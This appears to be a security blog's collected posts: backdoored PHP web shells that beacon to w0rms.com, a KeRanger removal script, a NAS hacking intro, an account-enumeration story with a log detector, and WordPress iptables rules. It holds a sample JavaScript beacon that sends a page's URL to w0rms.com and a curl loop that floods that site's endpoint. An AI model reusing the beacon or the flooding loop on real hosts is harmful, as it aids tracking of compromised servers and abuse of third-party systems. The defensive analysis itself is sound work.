
Shady shells

I was in need of some web shells for some security research I was conducting. I found w0rms.com, which has a nice selection of shells that can be downloaded to accommodate my need to test some malicious PHP code in my application.

Backdoor

As expected, every shell on w0rms.com is backdoored (backdoor the backdoors, eh?).

This code is found at the bottom of EVERY shell supplied by w0rms.com. These scripts are inherently untrustworthy and should never be run on your web server: they are often backdoored and do all kinds of other nasty things. They are used by bad actors to view, modify, and often upload more files to compromised PHP web applications. The JavaScript found in each of the supplied web shells sends the location of each web shell to the owners of w0rms.com:

This means that when a bad actor uses a malicious web shell that was posted on w0rms.com, the location of that shell is sent to the owners of w0rms.com, who from there likely upload additional malicious code automatically. This is very common and clearly shows that there is no honor among script kiddies.

I hope that they sanitize their input and check that it’s actually a valid URL 🙂

$ while true; do curl -A butts http://w0rms.com/oku/kaydet.php?a=$RANDOM; done
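As an added example that is not part of the original post, here is a small Python scanner for the defender's side of this: it looks for <script> blocks appended after the last PHP close tag that reference an external host, which is where a beacon like the one described would sit. The sample shell content is constructed (its PHP body is a harmless placeholder); the beacon URL path is taken from the curl line above.

```python
import re
from pathlib import Path

# Constructed sample of what the post describes: a PHP file whose real code
# ends at "?>", followed by an appended <script> that beacons the shell's URL
# to a third party. The PHP body here is a harmless placeholder.
SAMPLE_SHELL = b"""<?php /* shell code would be here */ echo 'ok'; ?>
<script>
new Image().src = "http://w0rms.com/oku/kaydet.php?a=" + encodeURIComponent(location.href);
</script>
"""
CLEAN_FILE = b"<?php echo 'ok'; ?>\n<script src=\"/js/app.js\"></script>\n"

SCRIPT_RE = re.compile(rb"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
HOST_RE = re.compile(rb"https?://([a-z0-9.-]+)", re.IGNORECASE)

def find_beacons(content, own_hosts=()):
    """Return external hosts referenced from <script> blocks that appear
    after the last PHP close tag, where an appended beacon would sit."""
    end = content.rfind(b"?>")
    if end == -1:
        return []
    tail = content[end + 2:]
    hosts = []
    for block in SCRIPT_RE.findall(tail):
        for host in HOST_RE.findall(block):
            host = host.decode().lower()
            if host not in own_hosts and host not in hosts:
                hosts.append(host)
    return hosts

def scan_webroot(root, own_hosts=()):
    """Map each PHP file under root to the beacon hosts found in it."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        hosts = find_beacons(path.read_bytes(), own_hosts)
        if hosts:
            hits[str(path)] = hosts
    return hits

if __name__ == "__main__":
    import sys
    for path, hosts in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{path}: beacon to {', '.join(hosts)}")
```

Pass your own site's hostnames in own_hosts so legitimate script tags are not reported.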


KeRanger ransomware removal script

KeRanger isn’t the first malware for OS X, but it’s annoying and inconvenient as most ransomware is. I wrote this little script to check for KeRanger and remove it if found on your OS X machine. Read and understand the script before you run it as you should with any code you execute on your system. This comes with no guarantee or warranties — just high-fives. Also on Github. This only works BEFORE the lockout.

#!/bin/bash
#
# @dustyfresh
#
# March 2016
#
# Checks for the KeRanger indicator (General.rtf inside the trojanised
# Transmission.app, either installed or still on the mounted disk image)
# and removes the known files if the user agrees. Only useful BEFORE the lockout.

INSTALLED="/Applications/Transmission.app/Contents/Resources/General.rtf"
MOUNTED="/Volumes/Transmission/Transmission.app/Contents/Resources/General.rtf"

# Infected if the indicator exists in EITHER location; clean only if both are absent.
if [[ ! -e "$INSTALLED" && ! -e "$MOUNTED" ]]; then
	echo "Yay. This machine is not infected."
else
	echo "Infected -- we are going to need your password so we can remove KeRanger from your system."
	echo "Would you like to proceed with removing malware? (y/n)"
	read -r answer
	if [[ $answer == "y" ]]; then
		echo "Removing KeRanger....."
		# Stop the running encryptor process before deleting its files
		sudo pkill -f 'kernel_service' &>/dev/null
		# The dropped binary lives in the user's Library folder (there is no /Users/Library on OS X)
		for f in ~/Library/kernel_service /Applications/Transmission.app; do
			sudo rm -rf "$f"
		done
		# KeRanger's state/marker files
		for f in ~/Library/.kernel_pid ~/Library/.kernel_time ~/Library/.kernel_complete ~/.kernel_service; do
			rm -rf "$f"
		done
		echo "Removed. We recommend that you reboot. Would you like to reboot now? (y/n)"
		read -r reboot_answer
		if [[ $reboot_answer == "y" ]]; then
			sudo reboot
		else
			exit 1
		fi
	else
		exit 1
	fi
fi

Getting a reverse shell on your Seagate personal NAS


I needed a cheap NAS system and had originally intended to give this one away as a gift to a relative for Christmas. However, said relative isn’t very technical and tl;dr I’m awful at choosing gifts for people so I decided to poke the proprietary device and see if we could have some fun with it.

The exact model that we will be talking about in this post is the Seagate Personal Cloud 3TB (STCR3000101). Here is a list of useful features:

  • Time Machine backup support for OS X (Broken on El Capitan)
  • Stream to Chromecast / AppleTV / Roku, LG & Samsung smart TVs
  • Use the Seagate media app to access content remotely
  • Web based control panel
  • Ability to install 3rd party applications like WordPress, OwnCloud, and Plex media server (This functionality will be important later)
  • more features are included but less important to me

So let’s start by connecting this thing to our network and performing a port scan.

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
82/tcp open xfer
83/tcp open mit-ml-dev
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
548/tcp open afp
631/tcp open ipp
1080/tcp open socks
2222/tcp open EtherNetIP-1
3128/tcp open squid-http
8000/tcp open http-alt
8080/tcp open http-proxy
8088/tcp open radan-http
8888/tcp open sun-answerbook
9000/tcp open cslistener
9091/tcp open xmltec-xmlmail

As you can see there isn’t anything special, but there are some services we care about, like SSH / SFTP, HTTP(S), etc. My initial test of brute-forcing the root user via SSH and SFTP did not seem to work, so it looks like we’ll have to find another way to get shell access.

I mentioned the useful features this proprietary NAS comes with, and one of them (the third-party application support flagged above) is exactly what we will be taking advantage of to get our shell today. How can we get shell access without SSH?



Pwning the utility company

Edit: This is a fictitious story; there is no utility company, and our villain in this story, “the utility company”, is an example. However, attacks like this occur every day, so I wanted to shine a light on how they happen in a proof of concept that was demonstrated properly to my audience, in a safe environment and with an entertaining back-story. Take the article with a grain of salt and always be responsible in disclosure. I hope that you enjoy the read.

One day a user was checking their mail and realized that they had failed to take care of a utility bill. Frantically, they took steps to pay the bill online via the self-service web application. The application was fairly simple and straightforward. “Authentication”, if you could call it that, consisted of entering the account number and hitting a button to continue. Upon hitting that button the user was shown a page with several pieces of personally identifiable information (the same data found in a phone book):

  • Address
  • First & Last name
  • Phone number

In such an angry state of mind the user tried to log in as fast as they could, mashing the keys of their assigned account number so that they could get the sting of another bill out of the way. Hitting the enter key displayed the usual page they were used to seeing, asking them to confirm account information, except that this time something was very different. The name was not correct: it was someone else’s name, someone who lives in the same state as the user and obviously uses the same utility company. Checking the account number, the user noticed that the last digit was the issue; it was exactly one above their own account number. Typically this indicates that account numbers are assigned incrementally (more than likely a database auto_increment). Are you thinking what I am? This could be scraped. So I set up a test lab with my own code and fake data to test a proof of concept.
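An added example, not part of the original post, showing the defender's side of this: a Python detector that reads web-server access logs and flags clients that walk through consecutive account numbers on the lookup page. The log lines, the /pay/confirm path and the account query parameter are all constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed access-log sample (Apache combined format, not from any real
# utility company): 203.0.113.7 walks consecutive account numbers while
# 198.51.100.22 looks up a single account twice.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2015:12:00:01 +0000] "GET /pay/confirm?account=10041 HTTP/1.1" 200 812 "-" "curl/7.35"
198.51.100.22 - - [10/Mar/2015:12:00:01 +0000] "GET /pay/confirm?account=77320 HTTP/1.1" 200 815 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2015:12:00:02 +0000] "GET /pay/confirm?account=10042 HTTP/1.1" 200 809 "-" "curl/7.35"
203.0.113.7 - - [10/Mar/2015:12:00:02 +0000] "GET /pay/confirm?account=10043 HTTP/1.1" 200 811 "-" "curl/7.35"
198.51.100.22 - - [10/Mar/2015:12:00:05 +0000] "GET /pay/confirm?account=77320 HTTP/1.1" 200 815 "-" "Mozilla/5.0"
198.51.100.22 - - [10/Mar/2015:12:00:06 +0000] "GET /css/site.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2015:12:00:03 +0000] "GET /pay/confirm?account=10044 HTTP/1.1" 200 808 "-" "curl/7.35"
"""

# Hypothetical endpoint and parameter name; adjust to the real lookup page.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) /pay/confirm\?account=(?P<acct>\d+) ')

def parse_lookups(log_text):
    """Map client IP -> list of account numbers it requested, in log order."""
    lookups = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            lookups[m.group("ip")].append(int(m.group("acct")))
    return lookups

def longest_consecutive_run(accts):
    """Longest run of account numbers that differ by exactly 1 once sorted."""
    nums = sorted(set(accts))
    best = run = 1 if nums else 0
    for prev, cur in zip(nums, nums[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best

def flag_enumerators(log_text, min_distinct=3, min_run=3):
    """Return {ip: (distinct_accounts, longest_run)} for clients whose lookups
    look like a walk through sequential account numbers."""
    flagged = {}
    for ip, accts in parse_lookups(log_text).items():
        distinct, run = len(set(accts)), longest_consecutive_run(accts)
        if distinct >= min_distinct and run >= min_run:
            flagged[ip] = (distinct, run)
    return flagged
```

A real user confirms one account (maybe twice); a scraper shows many distinct accounts with long consecutive runs, which is the signal the thresholds key on.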



Thwarting WordPress XMLRPC & GHOST attacks


GHOST – CVE-2015-0235 hit the internet and caused a lot of commotion, and it was found to affect WordPress installations through xmlrpc.php. This file is a constant security issue for the WordPress community: it has been the vector for everything from successful brute-force attacks to XMLRPC DoS attacks that bring down the targeted website. The XMLRPC protocol is used by WordPress to add entries programmatically. Using my favorite iptables module (string) we can drop requests that are attempting to abuse xmlrpc.php. By dropping this traffic we thwart the DoS, brute-force, and GHOST attacks that are being automated right now.

$ iptables -I INPUT -p tcp --dport 80 -m recent --name wordpress-XMLRPC-firewall --update --seconds 10 --hitcount 3 -j DROP

$ iptables -I INPUT -p tcp --dport 80 -m string --string 'POST /xmlrpc.php HTTP/1.1' --algo bm -m recent --name wordpress-XMLRPC-firewall --set

$ iptables -I INPUT -p tcp --dport 80 -m string --string 'GET /xmlrpc.php HTTP/1.1' --algo bm -m recent --name wordpress-XMLRPC-firewall --set

What is happening above is that the two --set rules use the string module to find HTTP requests for xmlrpc.php on port 80 and record the source address in the recent list named wordpress-XMLRPC-firewall. The --update rule then drops any further port-80 traffic from an address that has been recorded 3 or more times within 10 seconds, and because --update refreshes the timestamp on every match, the block lasts as long as the attacker keeps hammering. Since the commands use -I, each one is inserted at the top of the chain, so run them in the order shown: the --set rules end up ahead of the DROP rule, which they must be for the list ever to be populated. Two things to watch when adapting this: a -m state --state NEW match never sees the request line (the first packet of a new connection is a bare SYN; the HTTP request arrives on an ESTABLISHED connection), and a --update rule with no matching --set rule never adds anyone to the list, so either mistake leaves the rule silently matching nothing. This also only covers plain HTTP on port 80; over HTTPS the request is encrypted and the string module cannot see it. Once an address trips the limit it is unable to initiate connections over port 80, thus thwarting the most common attacks on WordPress XMLRPC.
